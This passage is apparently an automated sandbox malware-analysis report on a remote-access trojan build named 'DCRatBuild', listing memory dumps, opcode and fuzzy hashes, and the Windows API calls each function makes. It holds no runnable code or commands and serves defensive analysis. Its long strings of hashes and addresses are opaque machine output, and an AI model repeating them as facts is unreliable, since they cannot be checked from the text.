• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: H_prolog$CloseFind
• String ID:
• API String ID: 2506663941-0
• Opcode ID: ba768ced15235be8d1c7e8bd7a5405b3fed23275a913d353758d54bd85ffc0b9
• Instruction ID: 6dd5f357108c098e7ab4228c5c63ceda8c98ab4d4cd37c087303e6c150459f4d
• Opcode Fuzzy Hash: ba768ced15235be8d1c7e8bd7a5405b3fed23275a913d353758d54bd85ffc0b9
• Instruction Fuzzy Hash: 9841E6719442189ADF30DB65CC55AEABBB8AF11308F0400FFE48A97193EB795EC4CB14
APIs
• __EH_prolog.LIBCMT ref: 004913E1
  • Part of subcall function 00495E37: __EH_prolog.LIBCMT ref: 00495E3C
  • Part of subcall function 0049CE40: __EH_prolog.LIBCMT ref: 0049CE45
  • Part of subcall function 0049B505: __EH_prolog.LIBCMT ref: 0049B50A
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: ef7cef380f4bf34a0ea106cd778a54d10855f478b94c8a9a168a979f66a34218
• Instruction ID: e8831d87871a08b0adc8753cb9b4c4cf73e53b71ceb6354d5aa7b737a2772534
• Opcode Fuzzy Hash: ef7cef380f4bf34a0ea106cd778a54d10855f478b94c8a9a168a979f66a34218
• Instruction Fuzzy Hash: 2E416AB0905B419EE724CF7A8885AE6FAE5BB19314F50493FE5FE83282C7352654CB14
APIs
• __EH_prolog.LIBCMT ref: 004913E1
  • Part of subcall function 00495E37: __EH_prolog.LIBCMT ref: 00495E3C
  • Part of subcall function 0049CE40: __EH_prolog.LIBCMT ref: 0049CE45
  • Part of subcall function 0049B505: __EH_prolog.LIBCMT ref: 0049B50A
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 6129e99c6343a4ebb274e8ad1a09ec571e850130d9aa3b0d4c48e208fa07ebc5
• Instruction ID: 16a2109e2f6277054fafc9844dd6edd649cdf14bd141545886564d0b23ec426a
• Opcode Fuzzy Hash: 6129e99c6343a4ebb274e8ad1a09ec571e850130d9aa3b0d4c48e208fa07ebc5
• Instruction Fuzzy Hash: 2C4149B0905B409EE724DF7A8885AE6FAE5BB19314F50492F95FE83281C7352654CB14
APIs
• __EH_prolog.LIBCMT ref: 004AB098
  • Part of subcall function 004913DC: __EH_prolog.LIBCMT ref: 004913E1
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: acdc2b3676071164dc54ecf4aad90338087f97d46ae63a8a3bc8c485fc53d8bd
• Instruction ID: c62bbc2498dd9790845972c32033405b4f19275ea5fb13f6815e50493d0427cb
• Opcode Fuzzy Hash: acdc2b3676071164dc54ecf4aad90338087f97d46ae63a8a3bc8c485fc53d8bd
• Instruction Fuzzy Hash: B3318D75C002499ACF15DF66C8519EEBBB4EF19308F1044AFE409B3242D739AE04CBA9
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 004BACF8
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: 8a7fc6a9b170641aa8426f9ba3d5defc4aaf3cdf649ed4ba705f86801ecd622b
• Instruction ID: dae18cb7abdb5d72c8f933b91624229da300ba0e75ae0c30aa48f8e0f525c7b3
• Opcode Fuzzy Hash: 8a7fc6a9b170641aa8426f9ba3d5defc4aaf3cdf649ed4ba705f86801ecd622b
• Instruction Fuzzy Hash: 42113A376012256F9F219E29EC408DB77AAEB807247164132FD15EB344D738DC2197EA
APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 4e526a91627a11a3e304ad342b6c37bb35e68c9afa316a61457f3f2e495d912f
                                                                                                                        • Instruction ID: c2318bac22234cc5f52b27edeb2cf5773133d40190723109511cf585b3a521a9
                                                                                                                        • Opcode Fuzzy Hash: 4e526a91627a11a3e304ad342b6c37bb35e68c9afa316a61457f3f2e495d912f
                                                                                                                        • Instruction Fuzzy Hash: 5B018633D00525ABCF11AB69CD819DEBF31AF89754B01457EE811B7252DA388D0086A8
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004BB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004B9813,00000001,00000364,?,004B3F73,00000050,?,004D1030,00000200), ref: 004BB177
                                                                                                                        • _free.LIBCMT ref: 004BC4E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                        • Instruction ID: 1c5f0503afabde8e0fb74a9ac9d2383cf7c7666df653f3ab636dde94ca448916
                                                                                                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                        • Instruction Fuzzy Hash: 9E01D672200305ABE3358E6998C59AAFBEDEB85370F25091EE59483281EA74A905C778
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004B9813,00000001,00000364,?,004B3F73,00000050,?,004D1030,00000200), ref: 004BB177
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: a7aa6061bb7f14d10c6c8b1e92e8441ab2a54e52afb30922893652cc167ebbb1
                                                                                                                        • Instruction ID: 964203905c65d6e9ed0643f2d1cceb6a3fa6a09e27a83eee54c529853fdb6f80
                                                                                                                        • Opcode Fuzzy Hash: a7aa6061bb7f14d10c6c8b1e92e8441ab2a54e52afb30922893652cc167ebbb1
                                                                                                                        • Instruction Fuzzy Hash: 32F0B4325051256BEB615A2AAC15BEF7748EB417F0B188227B80896290CBA8DD0286FC
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004B3C3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        • Opcode ID: b6e658a19216e108c91db912889dced3581fd2f172c9ba61a17b590fd2d64355
                                                                                                                        • Instruction ID: 75b6d8f5a83858b42404078940f5f4f529a95cf28b5399f0bacee89506cdedbc
                                                                                                                        • Opcode Fuzzy Hash: b6e658a19216e108c91db912889dced3581fd2f172c9ba61a17b590fd2d64355
                                                                                                                        • Instruction Fuzzy Hash: 8BF0A7332042169F8F114EEAEC009DB7BB9EF01B227104126FA05E7294DB35DA20C7A4
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: b30d46504ba7aba9a5f4587255d27d590505961ba39d264a2a94a9a9e168d197
                                                                                                                        • Instruction ID: 1382f3df430cddb48555ee98ccc8b7c49d588f5849e73e338c56426de4ebfa65
                                                                                                                        • Opcode Fuzzy Hash: b30d46504ba7aba9a5f4587255d27d590505961ba39d264a2a94a9a9e168d197
                                                                                                                        • Instruction Fuzzy Hash: 68E0653120611557EBB12A6A9C15BDF764C9B417B4F15012FBC18D6291CF69CC01C1FD
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00495AC2
                                                                                                                          • Part of subcall function 0049B505: __EH_prolog.LIBCMT ref: 0049B50A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: 424402ce5bca5df051ba271f986fa65608aa8acb94015cde56257a71d97175f1
                                                                                                                        • Instruction ID: 307cb298e530a01297ee442900e40ab066d96b8c28b0afcb725bd927f4e9627d
                                                                                                                        • Opcode Fuzzy Hash: 424402ce5bca5df051ba271f986fa65608aa8acb94015cde56257a71d97175f1
                                                                                                                        • Instruction Fuzzy Hash: B001DC30801680DAD725EBB8C0817DDFBA4DF2530CF50808FA45A53282CBB82B08D7AB
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0049A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6C4
                                                                                                                          • Part of subcall function 0049A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6F2
                                                                                                                          • Part of subcall function 0049A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0049A592,000000FF,?,?), ref: 0049A6FE
                                                                                                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0049A598
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1464966427-0
                                                                                                                        • Opcode ID: c79349752ce5389a10a8b49364b6865a4a71426b68d5b8290853dd400da02ccf
                                                                                                                        • Instruction ID: 90491fbd6662807a8989ba9ac030b145cc663bd579e1d69a4da2a4d41878a468
                                                                                                                        • Opcode Fuzzy Hash: c79349752ce5389a10a8b49364b6865a4a71426b68d5b8290853dd400da02ccf
                                                                                                                        • Instruction Fuzzy Hash: A7F0E931008390AACF6257B44904BC77FE05F15335F04CA5FF0FD12196C27910A48BA7
                                                                                                                        APIs
                                                                                                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 004A0E3D
Memory Dump Source
• Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
• Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
Similarity
• API ID: ExecutionStateThread
• String ID:
• API String ID: 2211380416-0
• Opcode ID: b117dc679f55a8d6b1e7f479dbdde388a70906eefc05d17154357b90c11e01e6
• Instruction ID: 7b757ce1be3e1b2a37e6295f32899103eb51526fba645c5a4d7eb5f232ce8e40
• Opcode Fuzzy Hash: b117dc679f55a8d6b1e7f479dbdde388a70906eefc05d17154357b90c11e01e6
• Instruction Fuzzy Hash: EED0C21160105426DE22332A2815BFF2A068FEB329F0D003BB54A5B6A7CA4C0882A27E
APIs
• GdipAlloc.GDIPLUS(00000010), ref: 004AA62C
  • Part of subcall function 004AA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004AA3DA
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
• Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
• Instruction ID: b27898bb6229198e456b8905366f3800063eb6dce678ab7ca55b1461776ea0da
• Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
• Instruction Fuzzy Hash: EFD0A73020020877DF01AB228D0296E7595EB22344F008027BC82C5141EBB6D920D66B
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,004A1B3E), ref: 004ADD92
  • Part of subcall function 004AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
  • Part of subcall function 004AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
  • Part of subcall function 004AB568: IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
  • Part of subcall function 004AB568: TranslateMessage.USER32(?), ref: 004AB5AC
  • Part of subcall function 004AB568: DispatchMessageW.USER32(?), ref: 004AB5B6
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
• Opcode ID: 466734a6050365deed3c95483fada1b22f829e8ce4a9b077f603324e6dd2f2f9
• Instruction ID: a3f6301daa7ea548014cbfc9421ca3b82c282766e12ac6b9613dd3f9afe0d89a
• Opcode Fuzzy Hash: 466734a6050365deed3c95483fada1b22f829e8ce4a9b077f603324e6dd2f2f9
• Instruction Fuzzy Hash: F6D09E32144300BAD6012B52CE06F1A7AA2EB99B09F404599B284740B186729D31DB19
APIs
• DloadProtectSection.DELAYIMP ref: 004AE5E3
Similarity
• API ID: DloadProtectSection
• String ID:
• API String ID: 2203082970-0
• Opcode ID: ad15f85b80ce200ef7359652751ab9966a7a2bd290bdd55984640c0b6ac7146a
• Instruction ID: d2f3efebc51976db5ed18332f3fb920d5da7fbd7dfa8fb4e7fa5fae07bfce0d9
• Opcode Fuzzy Hash: ad15f85b80ce200ef7359652751ab9966a7a2bd290bdd55984640c0b6ac7146a
• Instruction Fuzzy Hash: BED0C774580180DAD605EB97A88576532547336704FD00517F26591561D66C4491C70D
APIs
• GetFileType.KERNELBASE(000000FF,004997BE), ref: 004998C8
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: f1160e479780cf0632f6cb43d06a13d48309ec497647cdb95e3e1e32a739dbf1
• Instruction ID: f82bd79046fce0176d76b98e24919742dff970aa88a98cc5086600496d4d2e30
• Opcode Fuzzy Hash: f1160e479780cf0632f6cb43d06a13d48309ec497647cdb95e3e1e32a739dbf1
• Instruction Fuzzy Hash: A9C01234410105858F60EA2898440967B11AA533667B486BDC028851A1D326CC4BEA04
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 9ff7461893d18f697e13260c3873452ddb8a7842aa7109c9d02bcf622ababc81
• Instruction ID: 5ac416f7462c6813b0a5860740a5e77690287a5a1212e9d21cfc171ad3bf34b1
• Opcode Fuzzy Hash: 9ff7461893d18f697e13260c3873452ddb8a7842aa7109c9d02bcf622ababc81
• Instruction Fuzzy Hash: 85B012E6358000BC3184A1071D02E37020CC1D7B15330C02FFD28C60C4DC4C4C05063F
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: ffe1b6e1131de524be6166dad6d9171db1f1f618bd7e6e2f256d3a1a4760f17e
• Instruction ID: 1f14a716a26eb3d06206faaa0bb212d9c21a7b73ffa80c51151dabee4d0a318c
• Opcode Fuzzy Hash: ffe1b6e1131de524be6166dad6d9171db1f1f618bd7e6e2f256d3a1a4760f17e
• Instruction Fuzzy Hash: CDB012E53580007C318461071E02E37020CC1D7B15330C02FFA28C60C4DC4C0C0A063F
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 491b81a5b05e451922fee76e71e648b2f94a2efe125fa4dbd82e1b761e929e01
• Instruction ID: b6734cf9ff7e59625239c99804599aeaaf4ce19fa62aed521e83a182d1217387
• Opcode Fuzzy Hash: 491b81a5b05e451922fee76e71e648b2f94a2efe125fa4dbd82e1b761e929e01
• Instruction Fuzzy Hash: 7AB092A5258000BC2144A1065902E370208C196B15330C02FF828C6085D84C4A01063F
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
  • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
  • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 375947cc706391214d907e966c4379b124777291110c11dea190b0b6b24522ac
                                                                                                                        • Instruction ID: dcec842289d0d85fbdda975705b0c3dc41928361a4fe9abe6aea359aee9e356f
                                                                                                                        • Opcode Fuzzy Hash: 375947cc706391214d907e966c4379b124777291110c11dea190b0b6b24522ac
                                                                                                                        • Instruction Fuzzy Hash: 5CA011EA2A80023C300822032E02E3B020CC0E2B28330802FF838AA0C0AC8C08020A3F
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ee146279d84b6e11ac65e4ead98385b2130499bdb9a82b60cd7dac215c04e91e
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
